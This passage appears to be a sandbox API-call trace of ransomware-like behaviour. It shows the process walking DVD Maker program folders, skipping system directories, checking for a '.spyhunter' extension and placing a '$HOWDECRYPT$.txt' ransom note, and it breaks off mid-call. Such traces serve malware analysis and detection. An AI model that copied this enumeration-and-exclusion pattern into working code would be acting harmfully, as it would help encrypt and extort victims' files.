0x2c310e0 [0092.715] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.715] lstrcmpiW (lpString1="Title_mainImage-mask.png", lpString2="Windows") returned -1 [0092.715] lstrlenW (lpString="Windows") returned 7 [0092.715] lstrcmpiW (lpString1="Title_mainImage-mask.png", lpString2="$Recycle.bin") returned 1 [0092.715] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.715] lstrcmpiW (lpString1="Title_mainImage-mask.png", lpString2="System Volume Information") returned 1 [0092.715] lstrlenW (lpString="System Volume Information") returned 25 [0092.715] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png") returned 81 [0092.717] StrStrIW (lpFirst="Title_mainImage-mask.png", lpSrch=".spyhunter") returned 0x0 [0092.717] lstrcmpW (lpString1="Title_mainImage-mask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.717] lstrcmpW (lpString1="Title_mainImage-mask.png", lpString2="_uninstalling_.png") returned 1 [0092.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png") returned 81 [0092.717] GetProcessHeap () returned 0x2c0000 [0092.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f418 [0092.717] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.717] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.717] lstrcmpiW (lpString1="Title_select-highlight.png", lpString2="Windows") returned -1 [0092.717] lstrlenW (lpString="Windows") returned 7 [0092.717] lstrcmpiW (lpString1="Title_select-highlight.png", lpString2="$Recycle.bin") returned 1 [0092.717] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.717] lstrcmpiW (lpString1="Title_select-highlight.png", lpString2="System Volume Information") returned 1 [0092.718] lstrlenW (lpString="System Volume Information") returned 25 [0092.718] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png") returned 83 [0092.718] StrStrIW (lpFirst="Title_select-highlight.png", lpSrch=".spyhunter") returned 0x0 [0092.718] lstrcmpW (lpString1="Title_select-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.718] lstrcmpW (lpString1="Title_select-highlight.png", lpString2="_uninstalling_.png") returned 1 [0092.718] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png") returned 83 [0092.718] GetProcessHeap () returned 0x2c0000 [0092.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f5f8 [0092.718] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.718] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.718] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.719] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\$HOWDECRYPT$.txt") returned 73 [0092.719] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\$HOWDECRYPT$.txt") returned 73 [0092.719] GetProcessHeap () returned 0x2c0000 [0092.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346728 [0092.719] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.719] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.719] lstrcmpiW (lpString1="menu_style_default_Thumbnail.png", lpString2="Windows") returned -1 [0092.719] lstrlenW (lpString="Windows") returned 7 [0092.719] lstrcmpiW (lpString1="menu_style_default_Thumbnail.png", lpString2="$Recycle.bin") returned 1 [0092.719] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.719] lstrcmpiW (lpString1="menu_style_default_Thumbnail.png", lpString2="System Volume Information") returned -1 [0092.719] lstrlenW (lpString="System Volume Information") returned 25 [0092.719] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png") returned 80 [0092.719] StrStrIW (lpFirst="menu_style_default_Thumbnail.png", lpSrch=".spyhunter") returned 0x0 [0092.719] lstrcmpW (lpString1="menu_style_default_Thumbnail.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.719] lstrcmpW (lpString1="menu_style_default_Thumbnail.png", lpString2="_uninstalling_.png") returned 1 [0092.719] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png") returned 80 [0092.719] GetProcessHeap () returned 0x2c0000 [0092.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f6e8 [0092.719] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.719] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.719] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.720] lstrlenW (lpString="Windows") returned 7 [0092.720] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.720] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.720] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.720] lstrlenW (lpString="System Volume Information") returned 25 [0092.720] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png") returned 80 [0092.720] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.720] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.720] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.720] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png") returned 80 [0092.720] GetProcessHeap () returned 0x2c0000 [0092.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f7d8 [0092.721] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.721] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.721] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.721] lstrlenW (lpString="Windows") returned 7 [0092.721] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.721] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.721] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.721] lstrlenW (lpString="System Volume Information") returned 25 [0092.721] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png") returned 86 [0092.721] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.721] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.721] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.721] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png") returned 86 [0092.721] GetProcessHeap () returned 0x2c0000 [0092.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x355698 [0092.721] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0092.721] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.721] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.721] lstrlenW (lpString="Windows") returned 7 [0092.721] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.721] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.721] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.721] lstrlenW (lpString="System Volume Information") returned 25 [0092.721] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png") returned 81 [0092.721] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.721] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.723] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.723] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png") returned 81 [0092.723] GetProcessHeap () returned 0x2c0000 [0092.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f8c8 [0092.723] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0092.723] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.723] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.723] lstrlenW (lpString="Windows") returned 7 [0092.723] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.723] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.723] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.723] lstrlenW (lpString="System Volume Information") returned 25 [0092.723] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png") returned 87 [0092.723] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.723] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.723] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.723] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png") returned 87 [0092.723] GetProcessHeap () returned 0x2c0000 [0092.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355790 [0092.723] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0092.723] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.723] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.723] lstrlenW (lpString="Windows") returned 7 [0092.724] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.724] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.724] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.724] lstrlenW (lpString="System Volume Information") returned 25 [0092.724] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png") returned 78 [0092.724] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.724] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.724] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png") returned 78 [0092.724] GetProcessHeap () returned 0x2c0000 [0092.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3782a8 [0092.724] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0092.724] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.724] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.724] lstrlenW (lpString="Windows") returned 7 [0092.724] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.724] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.724] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.724] lstrlenW (lpString="System Volume Information") returned 25 [0092.724] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png") returned 84 [0092.724] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.724] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.724] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png") returned 84 [0092.724] GetProcessHeap () returned 0x2c0000 [0092.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3554a8 [0092.724] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0092.724] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.724] lstrcmpiW (lpString1="OldAge", lpString2="Windows") returned -1 [0092.725] lstrlenW (lpString="Windows") returned 7 [0092.725] lstrcmpiW (lpString1="OldAge", lpString2="$Recycle.bin") returned 1 [0092.725] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.725] lstrcmpiW (lpString1="OldAge", lpString2="System Volume Information") returned -1 [0092.725] lstrlenW (lpString="System Volume Information") returned 25 [0092.725] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 54 [0092.725] lstrcmpW (lpString1="OldAge", lpString2=".") returned 1 [0092.725] lstrcmpW (lpString1="OldAge", lpString2="..") returned 1 [0092.725] GetProcessHeap () returned 0x2c0000 [0092.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.725] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*") returned 56 [0092.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.735] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.735] lstrlenW (lpString="Windows") returned 7 [0092.736] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.736] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.736] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.736] lstrlenW (lpString="System Volume Information") returned 25 [0092.736] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\.") returned 56 [0092.736] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.736] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.737] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.737] lstrlenW (lpString="Windows") returned 7 [0092.737] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.737] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.737] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.737] lstrlenW (lpString="System Volume Information") returned 25 [0092.737] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\..") returned 57 [0092.737] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.737] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.737] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.737] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0092.737] lstrlenW (lpString="Windows") returned 7 [0092.737] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0092.737] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.737] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0092.737] lstrlenW (lpString="System Volume Information") returned 25 [0092.737] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png") returned 72 [0092.737] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0092.737] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.737] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0092.737] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png") returned 72 [0092.737] GetProcessHeap () returned 0x2c0000 [0092.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346d48 [0092.737] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0092.737] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.737] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0092.737] lstrlenW (lpString="Windows") returned 7 [0092.737] lstrcmpiW (lpString1="15x15dot.png", lpString2="$Recycle.bin") returned 1 [0092.737] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.738] lstrcmpiW (lpString1="15x15dot.png", lpString2="System Volume Information") returned -1 [0092.738] lstrlenW (lpString="System Volume Information") returned 25 [0092.738] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png") returned 67 [0092.738] StrStrIW (lpFirst="15x15dot.png", lpSrch=".spyhunter") returned 0x0 [0092.738] lstrcmpW (lpString1="15x15dot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.738] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0092.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png") returned 67 [0092.738] GetProcessHeap () returned 0x2c0000 [0092.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358060 [0092.738] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0092.738] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.738] lstrcmpiW (lpString1="decorative_rule.png", lpString2="Windows") returned -1 [0092.738] lstrlenW (lpString="Windows") returned 7 [0092.738] lstrcmpiW (lpString1="decorative_rule.png", lpString2="$Recycle.bin") returned 1 [0092.738] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.738] lstrcmpiW (lpString1="decorative_rule.png", lpString2="System Volume Information") returned -1 [0092.738] lstrlenW (lpString="System Volume Information") returned 25 [0092.738] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png") returned 74 [0092.738] StrStrIW (lpFirst="decorative_rule.png", lpSrch=".spyhunter") returned 0x0 [0092.738] lstrcmpW (lpString1="decorative_rule.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.738] lstrcmpW (lpString1="decorative_rule.png", lpString2="_uninstalling_.png") returned 1 [0092.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png") returned 74 [0092.738] GetProcessHeap () returned 0x2c0000 [0092.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346648 [0092.738] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0092.738] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.738] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.738] lstrlenW (lpString="Windows") returned 7 [0092.738] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.738] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.739] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.739] lstrlenW (lpString="System Volume Information") returned 25 [0092.739] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png") returned 87 [0092.739] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.739] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.739] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.739] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png") returned 87 [0092.739] GetProcessHeap () returned 0x2c0000 [0092.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355888 [0092.739] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0092.739] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.739] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.739] lstrlenW (lpString="Windows") returned 7 [0092.739] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.739] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.739] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.739] lstrlenW (lpString="System Volume Information") returned 25 [0092.739] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png") returned 93 [0092.739] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.739] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.739] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.739] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png") returned 93 [0092.739] GetProcessHeap () returned 0x2c0000 [0092.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x381880 [0092.739] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0092.739] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.740] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.740] lstrlenW (lpString="Windows") returned 7 [0092.740] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.740] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.740] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.740] lstrlenW (lpString="System Volume Information") returned 25 [0092.740] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png") returned 88 [0092.740] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.740] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.740] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png") returned 88 [0092.740] GetProcessHeap () returned 0x2c0000 [0092.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x35a160 [0092.740] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0092.740] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.740] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.740] lstrlenW (lpString="Windows") returned 7 [0092.740] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.740] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.740] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.740] lstrlenW (lpString="System Volume Information") returned 25 [0092.740] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png") returned 94 [0092.740] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.740] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.740] lstrcmpW 